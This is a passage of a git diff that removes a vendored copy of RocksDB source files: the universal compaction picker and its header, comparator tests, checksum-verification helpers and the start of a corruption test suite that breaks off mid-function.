-  if (max_number_of_files_to_compact == UINT_MAX) {
-    compaction_reason = CompactionReason::kUniversalSortedRunNum;
-  } else {
-    compaction_reason = CompactionReason::kUniversalSizeRatio;
-  }
-  return new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(inputs), output_level,
-      mutable_cf_options.MaxFileSizeForLevel(output_level), LLONG_MAX, path_id,
-      GetCompressionType(ioptions_, vstorage, mutable_cf_options, start_level,
-                         1, enable_compression),
-      /* grandparents */ {}, /* is manual */ false, score,
-      false /* deletion_compaction */, compaction_reason);
-}
-
-// Look at overall size amplification. If size amplification
-// exceeeds the configured value, then do a compaction
-// of the candidate files all the way upto the earliest
-// base file (overrides configured values of file-size ratios,
-// min_merge_width and max_merge_width).
-//
-Compaction* UniversalCompactionPicker::PickCompactionToReduceSizeAmp(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, double score,
-    const std::vector<SortedRun>& sorted_runs, LogBuffer* log_buffer) {
-  // percentage flexibility while reducing size amplification
-  uint64_t ratio =
-      ioptions_.compaction_options_universal.max_size_amplification_percent;
-
-  unsigned int candidate_count = 0;
-  uint64_t candidate_size = 0;
-  size_t start_index = 0;
-  const SortedRun* sr = nullptr;
-
-  // Skip files that are already being compacted
-  for (size_t loop = 0; loop < sorted_runs.size() - 1; loop++) {
-    sr = &sorted_runs[loop];
-    if (!sr->being_compacted) {
-      start_index = loop;  // Consider this as the first candidate.
-      break;
-    }
-    char file_num_buf[kFormatFileNumberBufSize];
-    sr->Dump(file_num_buf, sizeof(file_num_buf), true);
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: skipping %s[%d] compacted %s",
-                     cf_name.c_str(), file_num_buf, loop,
-                     " cannot be a candidate to reduce size amp.\n");
-    sr = nullptr;
-  }
-
-  if (sr == nullptr) {
-    return nullptr;  // no candidate files
-  }
-  {
-    char file_num_buf[kFormatFileNumberBufSize];
-    sr->Dump(file_num_buf, sizeof(file_num_buf), true);
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] Universal: First candidate %s[%" ROCKSDB_PRIszt "] %s",
-        cf_name.c_str(), file_num_buf, start_index, " to reduce size amp.\n");
-  }
-
-  // keep adding up all the remaining files
-  for (size_t loop = start_index; loop < sorted_runs.size() - 1; loop++) {
-    sr = &sorted_runs[loop];
-    if (sr->being_compacted) {
-      char file_num_buf[kFormatFileNumberBufSize];
-      sr->Dump(file_num_buf, sizeof(file_num_buf), true);
-      ROCKS_LOG_BUFFER(
-          log_buffer, "[%s] Universal: Possible candidate %s[%d] %s",
-          cf_name.c_str(), file_num_buf, start_index,
-          " is already being compacted. No size amp reduction possible.\n");
-      return nullptr;
-    }
-    candidate_size += sr->compensated_file_size;
-    candidate_count++;
-  }
-  if (candidate_count == 0) {
-    return nullptr;
-  }
-
-  // size of earliest file
-  uint64_t earliest_file_size = sorted_runs.back().size;
-
-  // size amplification = percentage of additional size
-  if (candidate_size * 100 < ratio * earliest_file_size) {
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] Universal: size amp not needed. newer-files-total-size %" PRIu64
-        " earliest-file-size %" PRIu64,
-        cf_name.c_str(), candidate_size, earliest_file_size);
-    return nullptr;
-  } else {
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] Universal: size amp needed. newer-files-total-size %" PRIu64
-        " earliest-file-size %" PRIu64,
-        cf_name.c_str(), candidate_size, earliest_file_size);
-  }
-  assert(start_index < sorted_runs.size() - 1);
-
-  // Estimate total file size
-  uint64_t estimated_total_size = 0;
-  for (size_t loop = start_index; loop < sorted_runs.size(); loop++) {
-    estimated_total_size += sorted_runs[loop].size;
-  }
-  uint32_t path_id = GetPathId(ioptions_, estimated_total_size);
-  int start_level = sorted_runs[start_index].level;
-
-  std::vector<CompactionInputFiles> inputs(vstorage->num_levels());
-  for (size_t i = 0; i < inputs.size(); ++i) {
-    inputs[i].level = start_level + static_cast<int>(i);
-  }
-  // We always compact all the files, so always compress.
-  for (size_t loop = start_index; loop < sorted_runs.size(); loop++) {
-    auto& picking_sr = sorted_runs[loop];
-    if (picking_sr.level == 0) {
-      FileMetaData* f = picking_sr.file;
-      inputs[0].files.push_back(f);
-    } else {
-      auto& files = inputs[picking_sr.level - start_level].files;
-      for (auto* f : vstorage->LevelFiles(picking_sr.level)) {
-        files.push_back(f);
-      }
-    }
-    char file_num_buf[256];
-    picking_sr.DumpSizeInfo(file_num_buf, sizeof(file_num_buf), loop);
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: size amp picking %s",
-                     cf_name.c_str(), file_num_buf);
-  }
-
-  // output files at the bottom most level, unless it's reserved
-  int output_level = vstorage->num_levels() - 1;
-  // last level is reserved for the files ingested behind
-  if (ioptions_.allow_ingest_behind) {
-    assert(output_level > 1);
-    output_level--;
-  }
-
-  return new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(inputs),
-      output_level, mutable_cf_options.MaxFileSizeForLevel(output_level),
-      /* max_grandparent_overlap_bytes */ LLONG_MAX, path_id,
-      GetCompressionType(ioptions_, vstorage, mutable_cf_options,
-                         output_level, 1),
-      /* grandparents */ {}, /* is manual */ false, score,
-      false /* deletion_compaction */,
-      CompactionReason::kUniversalSizeAmplification);
-}
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compaction_picker_universal.h b/thirdparty/rocksdb/db/compaction_picker_universal.h
deleted file mode 100644
index 3f2bed3..0000000
--- a/thirdparty/rocksdb/db/compaction_picker_universal.h
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "db/compaction_picker.h"
-
-namespace rocksdb {
-class UniversalCompactionPicker : public CompactionPicker {
- public:
-  UniversalCompactionPicker(const ImmutableCFOptions& ioptions,
-                            const InternalKeyComparator* icmp)
-      : CompactionPicker(ioptions, icmp) {}
-  virtual Compaction* PickCompaction(const std::string& cf_name,
-                                     const MutableCFOptions& mutable_cf_options,
-                                     VersionStorageInfo* vstorage,
-                                     LogBuffer* log_buffer) override;
-
-  virtual int MaxOutputLevel() const override { return NumberLevels() - 1; }
-
-  virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override;
-
- private:
-  struct SortedRun {
-    SortedRun(int _level, FileMetaData* _file, uint64_t _size,
-              uint64_t _compensated_file_size, bool _being_compacted)
-        : level(_level),
-          file(_file),
-          size(_size),
-          compensated_file_size(_compensated_file_size),
-          being_compacted(_being_compacted) {
-      assert(compensated_file_size > 0);
-      assert(level != 0 || file != nullptr);
-    }
-
-    void Dump(char* out_buf, size_t out_buf_size,
-              bool print_path = false) const;
-
-    // sorted_run_count is added into the string to print
-    void DumpSizeInfo(char* out_buf, size_t out_buf_size,
-                      size_t sorted_run_count) const;
-
-    int level;
-    // `file` Will be null for level > 0. For level = 0, the sorted run is
-    // for this file.
-    FileMetaData* file;
-    // For level > 0, `size` and `compensated_file_size` are sum of sizes all
-    // files in the level. `being_compacted` should be the same for all files
-    // in a non-zero level. Use the value here.
-    uint64_t size;
-    uint64_t compensated_file_size;
-    bool being_compacted;
-  };
-
-  // Pick Universal compaction to limit read amplification
-  Compaction* PickCompactionToReduceSortedRuns(
-      const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-      VersionStorageInfo* vstorage, double score, unsigned int ratio,
-      unsigned int num_files, const std::vector<SortedRun>& sorted_runs,
-      LogBuffer* log_buffer);
-
-  // Pick Universal compaction to limit space amplification.
-  Compaction* PickCompactionToReduceSizeAmp(
-      const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-      VersionStorageInfo* vstorage, double score,
-      const std::vector<SortedRun>& sorted_runs, LogBuffer* log_buffer);
-
-  // Used in universal compaction when the enabled_trivial_move
-  // option is set. Checks whether there are any overlapping files
-  // in the input. Returns true if the input files are non
-  // overlapping.
-  bool IsInputFilesNonOverlapping(Compaction* c);
-
-  static std::vector<SortedRun> CalculateSortedRuns(
-      const VersionStorageInfo& vstorage, const ImmutableCFOptions& ioptions);
-
-  // Pick a path ID to place a newly generated file, with its estimated file
-  // size.
-  static uint32_t GetPathId(const ImmutableCFOptions& ioptions,
-                            uint64_t file_size);
-};
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/comparator_db_test.cc b/thirdparty/rocksdb/db/comparator_db_test.cc
deleted file mode 100644
index 28a2a56..0000000
--- a/thirdparty/rocksdb/db/comparator_db_test.cc
+++ /dev/null
@@ -1,441 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include <map>
-#include <string>
-
-#include "memtable/stl_wrappers.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "util/hash.h"
-#include "util/kv_map.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-using std::unique_ptr;
-
-namespace rocksdb {
-namespace {
-
-static const Comparator* comparator;
-
-class KVIter : public Iterator {
- public:
-  explicit KVIter(const stl_wrappers::KVMap* map)
-      : map_(map), iter_(map_->end()) {}
-  virtual bool Valid() const override { return iter_ != map_->end(); }
-  virtual void SeekToFirst() override { iter_ = map_->begin(); }
-  virtual void SeekToLast() override {
-    if (map_->empty()) {
-      iter_ = map_->end();
-    } else {
-      iter_ = map_->find(map_->rbegin()->first);
-    }
-  }
-  virtual void Seek(const Slice& k) override {
-    iter_ = map_->lower_bound(k.ToString());
-  }
-  virtual void SeekForPrev(const Slice& k) override {
-    iter_ = map_->upper_bound(k.ToString());
-    Prev();
-  }
-  virtual void Next() override { ++iter_; }
-  virtual void Prev() override {
-    if (iter_ == map_->begin()) {
-      iter_ = map_->end();
-      return;
-    }
-    --iter_;
-  }
-
-  virtual Slice key() const override { return iter_->first; }
-  virtual Slice value() const override { return iter_->second; }
-  virtual Status status() const override { return Status::OK(); }
-
- private:
-  const stl_wrappers::KVMap* const map_;
-  stl_wrappers::KVMap::const_iterator iter_;
-};
-
-void AssertItersEqual(Iterator* iter1, Iterator* iter2) {
-  ASSERT_EQ(iter1->Valid(), iter2->Valid());
-  if (iter1->Valid()) {
-    ASSERT_EQ(iter1->key().ToString(), iter2->key().ToString());
-    ASSERT_EQ(iter1->value().ToString(), iter2->value().ToString());
-  }
-}
-
-// Measuring operations on DB (expect to be empty).
-// source_strings are candidate keys
-void DoRandomIteraratorTest(DB* db, std::vector<std::string> source_strings,
-                            Random* rnd, int num_writes, int num_iter_ops,
-                            int num_trigger_flush) {
-  stl_wrappers::KVMap map((stl_wrappers::LessOfComparator(comparator)));
-
-  for (int i = 0; i < num_writes; i++) {
-    if (num_trigger_flush > 0 && i != 0 && i % num_trigger_flush == 0) {
-      db->Flush(FlushOptions());
-    }
-
-    int type = rnd->Uniform(2);
-    int index = rnd->Uniform(static_cast<int>(source_strings.size()));
-    auto& key = source_strings[index];
-    switch (type) {
-      case 0:
-        // put
-        map[key] = key;
-        ASSERT_OK(db->Put(WriteOptions(), key, key));
-        break;
-      case 1:
-        // delete
-        if (map.find(key) != map.end()) {
-          map.erase(key);
-        }
-        ASSERT_OK(db->Delete(WriteOptions(), key));
-        break;
-      default:
-        assert(false);
-    }
-  }
-
-  std::unique_ptr<Iterator> iter(db->NewIterator(ReadOptions()));
-  std::unique_ptr<Iterator> result_iter(new KVIter(&map));
-
-  bool is_valid = false;
-  for (int i = 0; i < num_iter_ops; i++) {
-    // Random walk and make sure iter and result_iter returns the
-    // same key and value
-    int type = rnd->Uniform(6);
-    ASSERT_OK(iter->status());
-    switch (type) {
-      case 0:
-        // Seek to First
-        iter->SeekToFirst();
-        result_iter->SeekToFirst();
-        break;
-      case 1:
-        // Seek to last
-        iter->SeekToLast();
-        result_iter->SeekToLast();
-        break;
-      case 2: {
-        // Seek to random key
-        auto key_idx = rnd->Uniform(static_cast<int>(source_strings.size()));
-        auto key = source_strings[key_idx];
-        iter->Seek(key);
-        result_iter->Seek(key);
-        break;
-      }
-      case 3:
-        // Next
-        if (is_valid) {
-          iter->Next();
-          result_iter->Next();
-        } else {
-          continue;
-        }
-        break;
-      case 4:
-        // Prev
-        if (is_valid) {
-          iter->Prev();
-          result_iter->Prev();
-        } else {
-          continue;
-        }
-        break;
-      default: {
-        assert(type == 5);
-        auto key_idx = rnd->Uniform(static_cast<int>(source_strings.size()));
-        auto key = source_strings[key_idx];
-        std::string result;
-        auto status = db->Get(ReadOptions(), key, &result);
-        if (map.find(key) == map.end()) {
-          ASSERT_TRUE(status.IsNotFound());
-        } else {
-          ASSERT_EQ(map[key], result);
-        }
-        break;
-      }
-    }
-    AssertItersEqual(iter.get(), result_iter.get());
-    is_valid = iter->Valid();
-  }
-}
-
-class DoubleComparator : public Comparator {
- public:
-  DoubleComparator() {}
-
-  virtual const char* Name() const override { return "DoubleComparator"; }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-#ifndef CYGWIN
-    double da = std::stod(a.ToString());
-    double db = std::stod(b.ToString());
-#else
-    double da = std::strtod(a.ToString().c_str(), 0 /* endptr */);
-    double db = std::strtod(a.ToString().c_str(), 0 /* endptr */);
-#endif
-    if (da == db) {
-      return a.compare(b);
-    } else if (da > db) {
-      return 1;
-    } else {
-      return -1;
-    }
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-class HashComparator : public Comparator {
- public:
-  HashComparator() {}
-
-  virtual const char* Name() const override { return "HashComparator"; }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    uint32_t ha = Hash(a.data(), a.size(), 66);
-    uint32_t hb = Hash(b.data(), b.size(), 66);
-    if (ha == hb) {
-      return a.compare(b);
-    } else if (ha > hb) {
-      return 1;
-    } else {
-      return -1;
-    }
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-class TwoStrComparator : public Comparator {
- public:
-  TwoStrComparator() {}
-
-  virtual const char* Name() const override { return "TwoStrComparator"; }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    assert(a.size() >= 2);
-    assert(b.size() >= 2);
-    size_t size_a1 = static_cast<size_t>(a[0]);
-    size_t size_b1 = static_cast<size_t>(b[0]);
-    size_t size_a2 = static_cast<size_t>(a[1]);
-    size_t size_b2 = static_cast<size_t>(b[1]);
-    assert(size_a1 + size_a2 + 2 == a.size());
-    assert(size_b1 + size_b2 + 2 == b.size());
-
-    Slice a1 = Slice(a.data() + 2, size_a1);
-    Slice b1 = Slice(b.data() + 2, size_b1);
-    Slice a2 = Slice(a.data() + 2 + size_a1, size_a2);
-    Slice b2 = Slice(b.data() + 2 + size_b1, size_b2);
-
-    if (a1 != b1) {
-      return a1.compare(b1);
-    }
-    return a2.compare(b2);
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-}  // namespace
-
-class ComparatorDBTest : public testing::Test {
- private:
-  std::string dbname_;
-  Env* env_;
-  DB* db_;
-  Options last_options_;
-  std::unique_ptr<const Comparator> comparator_guard;
-
- public:
-  ComparatorDBTest() : env_(Env::Default()), db_(nullptr) {
-    comparator = BytewiseComparator();
-    dbname_ = test::TmpDir() + "/comparator_db_test";
-    EXPECT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  ~ComparatorDBTest() {
-    delete db_;
-    EXPECT_OK(DestroyDB(dbname_, last_options_));
-    comparator = BytewiseComparator();
-  }
-
-  DB* GetDB() { return db_; }
-
-  void SetOwnedComparator(const Comparator* cmp) {
-    comparator_guard.reset(cmp);
-    comparator = cmp;
-    last_options_.comparator = cmp;
-  }
-
-  // Return the current option configuration.
-  Options* GetOptions() { return &last_options_; }
-
-  void DestroyAndReopen() {
-    // Destroy using last options
-    Destroy();
-    ASSERT_OK(TryReopen());
-  }
-
-  void Destroy() {
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  Status TryReopen() {
-    delete db_;
-    db_ = nullptr;
-    last_options_.create_if_missing = true;
-
-    return DB::Open(last_options_, dbname_, &db_);
-  }
-};
-
-TEST_F(ComparatorDBTest, Bytewise) {
-  for (int rand_seed = 301; rand_seed < 306; rand_seed++) {
-    DestroyAndReopen();
-    Random rnd(rand_seed);
-    DoRandomIteraratorTest(GetDB(),
-                           {"a", "b", "c", "d", "e", "f", "g", "h", "i"}, &rnd,
-                           8, 100, 3);
-  }
-}
-
-TEST_F(ComparatorDBTest, SimpleSuffixReverseComparator) {
-  SetOwnedComparator(new test::SimpleSuffixReverseComparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    std::vector<std::string> source_prefixes;
-    // Randomly generate 5 prefixes
-    for (int i = 0; i < 5; i++) {
-      source_prefixes.push_back(test::RandomHumanReadableString(&rnd, 8));
-    }
-    for (int j = 0; j < 20; j++) {
-      int prefix_index = rnd.Uniform(static_cast<int>(source_prefixes.size()));
-      std::string key = source_prefixes[prefix_index] +
-                        test::RandomHumanReadableString(&rnd, rnd.Uniform(8));
-      source_strings.push_back(key);
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 30, 600, 66);
-  }
-}
-
-TEST_F(ComparatorDBTest, Uint64Comparator) {
-  SetOwnedComparator(test::Uint64Comparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-    Random64 rnd64(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    // Randomly generate source keys
-    for (int i = 0; i < 100; i++) {
-      uint64_t r = rnd64.Next();
-      std::string str;
-      str.resize(8);
-      memcpy(&str[0], static_cast<void*>(&r), 8);
-      source_strings.push_back(str);
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 200, 1000, 66);
-  }
-}
-
-TEST_F(ComparatorDBTest, DoubleComparator) {
-  SetOwnedComparator(new DoubleComparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    // Randomly generate source keys
-    for (int i = 0; i < 100; i++) {
-      uint32_t r = rnd.Next();
-      uint32_t divide_order = rnd.Uniform(8);
-      double to_divide = 1.0;
-      for (uint32_t j = 0; j < divide_order; j++) {
-        to_divide *= 10.0;
-      }
-      source_strings.push_back(ToString(r / to_divide));
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 200, 1000, 66);
-  }
-}
-
-TEST_F(ComparatorDBTest, HashComparator) {
-  SetOwnedComparator(new HashComparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    // Randomly generate source keys
-    for (int i = 0; i < 100; i++) {
-      source_strings.push_back(test::RandomKey(&rnd, 8));
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 200, 1000, 66);
-  }
-}
-
-TEST_F(ComparatorDBTest, TwoStrComparator) {
-  SetOwnedComparator(new TwoStrComparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    // Randomly generate source keys
-    for (int i = 0; i < 100; i++) {
-      std::string str;
-      uint32_t size1 = rnd.Uniform(8);
-      uint32_t size2 = rnd.Uniform(8);
-      str.append(1, static_cast<char>(size1));
-      str.append(1, static_cast<char>(size2));
-      str.append(test::RandomKey(&rnd, size1));
-      str.append(test::RandomKey(&rnd, size2));
-      source_strings.push_back(str);
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 200, 1000, 66);
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/convenience.cc b/thirdparty/rocksdb/db/convenience.cc
deleted file mode 100644
index 8ee31ca..0000000
--- a/thirdparty/rocksdb/db/convenience.cc
+++ /dev/null
@@ -1,58 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/convenience.h"
-
-#include "db/db_impl.h"
-#include "util/cast_util.h"
-
-namespace rocksdb {
-
-void CancelAllBackgroundWork(DB* db, bool wait) {
-  (static_cast_with_check<DBImpl, DB>(db->GetRootDB()))
-      ->CancelAllBackgroundWork(wait);
-}
-
-Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family,
-                          const Slice* begin, const Slice* end) {
-  return (static_cast_with_check<DBImpl, DB>(db->GetRootDB()))
-      ->DeleteFilesInRange(column_family, begin, end);
-}
-
-Status VerifySstFileChecksum(const Options& options,
-                             const EnvOptions& env_options,
-                             const std::string& file_path) {
-  unique_ptr<RandomAccessFile> file;
-  uint64_t file_size;
-  InternalKeyComparator internal_comparator(options.comparator);
-  ImmutableCFOptions ioptions(options);
-
-  Status s = ioptions.env->NewRandomAccessFile(file_path, &file, env_options);
-  if (s.ok()) {
-    s = ioptions.env->GetFileSize(file_path, &file_size);
-  } else {
-    return s;
-  }
-  unique_ptr<TableReader> table_reader;
-  std::unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(file), file_path));
-  s = ioptions.table_factory->NewTableReader(
-      TableReaderOptions(ioptions, env_options, internal_comparator,
-                         false /* skip_filters */, -1 /* level */),
-      std::move(file_reader), file_size, &table_reader,
-      false /* prefetch_index_and_filter_in_cache */);
-  if (!s.ok()) {
-    return s;
-  }
-  s = table_reader->VerifyChecksum();
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/corruption_test.cc b/thirdparty/rocksdb/db/corruption_test.cc
deleted file mode 100644
index 56e1578..0000000
--- a/thirdparty/rocksdb/db/corruption_test.cc
+++ /dev/null
@@ -1,518 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-
-#include <errno.h>
-#include <fcntl.h>
-#include <inttypes.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include "db/db_impl.h"
-#include "db/log_format.h"
-#include "db/version_set.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/table.h"
-#include "rocksdb/write_batch.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-static const int kValueSize = 1000;
-
-class CorruptionTest : public testing::Test {
- public:
-  test::ErrorEnv env_;
-  std::string dbname_;
-  shared_ptr<Cache> tiny_cache_;
-  Options options_;
-  DB* db_;
-
-  CorruptionTest() {
-    // If LRU cache shard bit is smaller than 2 (or -1 which will automatically
-    // set it to 0), test SequenceNumberRecovery will fail, likely because of a
-    // bug in recovery code. Keep it 4 for now to make the test passes.
-    tiny_cache_ = NewLRUCache(100, 4);
-    options_.wal_recovery_mode = WALRecoveryMode::kTolerateCorruptedTailRecords;
-    options_.env = &env_;
-    dbname_ = test::TmpDir() + "/corruption_test";
-    DestroyDB(dbname_, options_);
-
-    db_ = nullptr;
-    options_.create_if_missing = true;
-    BlockBasedTableOptions table_options;
-    table_options.block_size_deviation = 0;  // make unit test pass for now
-    options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    Reopen();
-    options_.create_if_missing = false;
-  }
-
-  ~CorruptionTest() {
-     delete db_;
-     DestroyDB(dbname_, Options());
-  }
-
-  void CloseDb() {
-    delete db_;
-    db_ = nullptr;
-  }
-
-  Status TryReopen(Options* options = nullptr) {
-    delete db_;
-    db_ = nullptr;
-    Options opt = (options ? *options : options_);
-    opt.env = &env_;
-    opt.arena_block_size = 4096;
-    BlockBasedTableOptions table_options;
-    table_options.block_cache = tiny_cache_;
-    table_options.block_size_deviation = 0;
-    opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    return DB::Open(opt, dbname_, &db_);
-  }
-
-  void Reopen(Options* options = nullptr) {
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void RepairDB() {
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(::rocksdb::RepairDB(dbname_, options_));
-  }
-
-  void Build(int n, int flush_every = 0) {
-    std::string key_space, value_space;
-    WriteBatch batch;
-    for (int i = 0; i < n; i++) {
-      if (flush_every != 0 && i != 0 && i % flush_every == 0) {
-        DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-        dbi->TEST_FlushMemTable();
-      }
-      //if ((i % 100) == 0) fprintf(stderr, "@ %d of %d\n", i, n);
-      Slice key = Key(i, &key_space);
-      batch.Clear();
-      batch.Put(key, Value(i, &value_space));
-      ASSERT_OK(db_->Write(WriteOptions(), &batch));
-    }
-  }
-
-  void Check(int min_expected, int max_expected) {
-    uint64_t next_expected = 0;
-    uint64_t missed = 0;
-    int bad_keys = 0;
-    int bad_values = 0;
-    int correct = 0;
-    std::string value_space;
-    // Do not verify checksums. If we verify checksums then the
-    // db itself will raise errors because data is corrupted.
-    // Instead, we want the reads to be successful and this test
-    // will detect whether the appropriate corruptions have
-    // occurred.
-    Iterator* iter = db_->NewIterator(ReadOptions(false, true));
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      uint64_t key;
-      Slice in(iter->key());
-      if (!ConsumeDecimalNumber(&in, &key) ||
-          !in.empty() ||
-          key < next_expected) {
-        bad_keys++;
-        continue;
-      }
-      missed += (key - next_expected);
-      next_expected = key + 1;
-      if (iter->value() != Value(static_cast<int>(key), &value_space)) {
-        bad_values++;
-      } else {
-        correct++;
-      }
-    }
-    delete iter;
-
-    fprintf(stderr,
-      "expected=%d..%d; got=%d; bad_keys=%d; bad_values=%d; missed=%llu\n",
-            min_expected, max_expected, correct, bad_keys, bad_values,
-            static_cast<unsigned long long>(missed));
-    ASSERT_LE(min_expected, correct);
-    ASSERT_GE(max_expected, correct);
-  }
-
-  void CorruptFile(const std::string& fname, int offset, int bytes_to_corrupt) {
-    struct stat sbuf;
-    if (stat(fname.c_str(), &sbuf) != 0) {
-      const char* msg = strerror(errno);
-      FAIL() << fname << ": " << msg;
-    }
-
-    if (offset < 0) {
-      // Relative to end of file; make it absolute
-      if (-offset > sbuf.st_size) {
-        offset = 0;
-      } else {
-        offset = static_cast<int>(sbuf.st_size + offset);
-      }
-    }
-    if (offset > sbuf.st_size) {
-      offset = static_cast<int>(sbuf.st_size);
-    }
-    if (offset + bytes_to_corrupt > sbuf.st_size) {
-      bytes_to_corrupt = static_cast<int>(sbuf.st_size - offset);
-    }
-
-    // Do it
-    std::string contents;
-    Status s = ReadFileToString(Env::Default(), fname, &contents);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    for (int i = 0; i < bytes_to_corrupt; i++) {
-      contents[i + offset] ^= 0x80;
-    }
-    s = WriteStringToFile(Env::Default(), contents, fname);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    Options options;
-    EnvOptions env_options;
-    ASSERT_NOK(VerifySstFileChecksum(options, env_options, fname));
-  }
-
-  void Corrupt(FileType filetype, int offset, int bytes_to_corrupt) {
-    // Pick file to corrupt
-    std::vector<std::string> filenames;
-    ASSERT_OK(env_.GetChildren(dbname_, &filenames));
-    uint64_t number;
-    FileType type;
-    std::string fname;
-    int picked_number = -1;
-    for (size_t i = 0; i < filenames.size(); i++) {
-      if (ParseFileName(filenames[i], &number, &type) &&
-          type == filetype &&
-          static_cast<int>(number) > picked_number) {  // Pick latest file
-        fname = dbname_ + "/" + filenames[i];
-        picked_number = static_cast<int>(number);
-      }
-    }
-    ASSERT_TRUE(!fname.empty()) << filetype;
-
-    CorruptFile(fname, offset, bytes_to_corrupt);
-  }
-
-  // corrupts exactly one file at level `level`. if no file found at level,
-  // asserts
-  void CorruptTableFileAtLevel(int level, int offset, int bytes_to_corrupt) {
-    std::vector<LiveFileMetaData> metadata;
-    db_->GetLiveFilesMetaData(&metadata);
